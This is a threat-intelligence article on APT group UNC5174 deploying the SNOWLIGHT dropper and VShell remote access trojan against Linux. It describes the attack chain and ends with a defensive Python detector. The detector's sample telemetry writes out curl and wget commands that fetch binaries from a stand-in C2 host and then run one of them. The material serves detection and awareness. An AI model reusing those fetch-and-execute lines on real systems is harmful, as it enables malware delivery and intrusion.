
The Chinese-linked APT group UNC5174 has been observed deploying an advanced malware toolkit targeting Linux systems, combining a custom downloader known as SNOWLIGHT with a stealthy and powerful remote access trojan called VShell.


What it is about

Originally developed by a Chinese developer under the alias Veo, VShell is a Golang-based RAT tool designed for red teaming and adversary simulation. While its GitHub page has since been taken offline, the tool’s latest known version, 4.9.3, continues circulating in underground communities, often in cracked form with extended license capabilities.

Unlike traditional tools like Cobalt Strike, VShell offers a native web-based interface, cross-platform support (Windows/Linux), and fileless execution capabilities. Once deployed, the attacker gains full control of the infected system, with features including terminal command execution, file browsing, screenshot capture, and persistent backdoor creation.


Modus operandi

According to threat intelligence reports, the attack chain begins with SNOWLIGHT acting as a dropper, executing a malicious bash script that downloads two components: one tied to SNOWLIGHT and another to the open-source Sliver C2 framework. These establish C2 communication and allow the final VShell payload to be delivered via a crafted request.

Notably, VShell uses WebSocket-based C2 channels and disguises its login page using a fake nginx screen to resist detection and scanning. Once inside, operators can generate a variety of payloads capable of bypassing popular antivirus solutions.

VShell’s strength lies in its stealth, usability, and native Linux support, positioning it as a favored tool in modern cyber operations. The tool is now actively used by Chinese-speaking actors for initial access, lateral movement, and long-term persistence in Linux environments.
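As an added defender-side illustration (not code from the original analysis or from CYBEROO), the following Python correlates constructed Linux endpoint events to flag the chain described above: a bash script that fetches two components, executes one of them, and whose child then opens a WebSocket (HTTP Upgrade) connection. The event tuple format, file paths and hostnames are assumptions made for the example.

```python
from collections import defaultdict

# Constructed sample telemetry, not real indicators: (pid, ppid, type, detail).
EVENTS = [
    (100, 1,   "exec", "/bin/bash /tmp/setup.sh"),
    (101, 100, "exec", "curl -o /tmp/a.bin http://c2.invalid/a"),
    (102, 100, "exec", "wget -O /tmp/b.bin http://c2.invalid/b"),
    (103, 100, "exec", "/tmp/a.bin"),
    (103, 100, "net",  "outbound tcp/443 Upgrade: websocket"),
    # Benign script: downloads two files but never executes them.
    (200, 1,   "exec", "/bin/bash /opt/mirror-sync.sh"),
    (201, 200, "exec", "curl -o /var/tmp/pkg.deb http://mirror.invalid/pkg"),
    (202, 200, "exec", "wget -O /var/tmp/sig http://mirror.invalid/sig"),
]

# Downloader binary -> flag that names its output file.
DOWNLOADERS = {"curl": "-o", "wget": "-O"}

def download_target(cmd):
    """Return the output path of a curl/wget command line, or None."""
    argv = cmd.split()
    flag = DOWNLOADERS.get(argv[0]) if argv else None
    if flag and flag in argv and argv.index(flag) + 1 < len(argv):
        return argv[argv.index(flag) + 1]
    return None

def find_dropper_chains(events):
    """Return pids of bash scripts that downloaded two or more files, executed
    one of them, and whose child then opened a WebSocket connection."""
    children = defaultdict(list)
    for pid, ppid, kind, detail in events:
        children[ppid].append((pid, kind, detail))
    flagged = []
    for pid, _ppid, kind, detail in events:
        if kind != "exec" or not detail.startswith("/bin/bash "):
            continue
        fetched = {download_target(d) for _, k, d in children[pid] if k == "exec"}
        fetched.discard(None)
        if len(fetched) < 2:
            continue
        # Children that executed one of the files this script just downloaded.
        ran = {c for c, k, d in children[pid] if k == "exec" and d.split()[0] in fetched}
        # ...and whether any of those children opened an HTTP Upgrade/WebSocket channel.
        ws = any(c in ran and k == "net" and "websocket" in d.lower()
                 for c, k, d in children[pid])
        if ws:
            flagged.append(pid)
    return flagged

if __name__ == "__main__":
    print(find_dropper_chains(EVENTS))  # [100]
```

The benign mirror-sync script is deliberately included so the rule fires on the download-then-execute-then-WebSocket sequence rather than on downloads alone.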


Attacks without distinction

With the increasing spread of open-source offensive tools, their misuse by nation-state-sponsored actors blurs the boundaries between state and criminal operations, greatly complicating attribution processes.

For this reason, organizations need 24-hour monitoring and response capabilities, backed by threat intelligence that covers both internal and external threats.

Analysis by Vasily Kononov – Threat Intelligence Lead, CYBEROO